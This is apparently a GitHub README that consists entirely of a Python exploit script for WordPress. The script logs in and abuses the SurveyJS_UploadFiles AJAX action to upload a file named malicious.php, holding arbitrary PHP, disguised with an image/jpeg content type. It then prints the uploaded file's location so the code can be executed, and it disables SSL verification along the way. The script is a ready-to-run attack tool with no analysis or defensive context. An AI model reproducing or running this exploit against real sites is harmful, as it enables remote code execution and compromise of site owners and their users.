README.md
Rendering markdown...
import requests
import argparse
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def upload_file(url, username, password, php_code):
# Start a session
session = requests.Session()
# Login data
login_data = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'redirect_to': url + '/wp-admin/',
'testcookie': '1'
}
# Perform login
login_url = f"{url}/wp-login.php"
response = session.post(login_url, data=login_data, verify=False)
# Check if login was successful by looking for the cookie
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("Login successful.")
# Prepare the file upload
files = {
'action': (None, 'SurveyJS_UploadFiles'),
'file': ('malicious.php', f'<?php {php_code} ?>', 'image/jpeg')
}
# Upload the file
upload_url = f"{url}/wp-admin/admin-ajax.php"
upload_response = session.post(upload_url, files=files, verify=False)
# Check the response
if upload_response.status_code == 200:
print("File uploaded successfully.")
try:
data = upload_response.json()
print(data["malicious.php"])
except json.JSONDecodeError:
print("Failed to parse JSON response.")
print("Response text:", upload_response.text)
else:
print("Failed to upload file. Status code:", upload_response.status_code)
else:
print("Login failed. Check your credentials.")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Upload a PHP file to a WordPress site.')
parser.add_argument('url', type=str, help='The URL of the WordPress site (e.g., http://example.com)')
parser.add_argument('username', type=str, help='Your WordPress username')
parser.add_argument('password', type=str, help='Your WordPress password')
parser.add_argument('--code', type=str, default='Arbitrary PHP code execution', help='PHP code to execute')
args = parser.parse_args()
upload_file(args.url, args.username, args.password, args.code)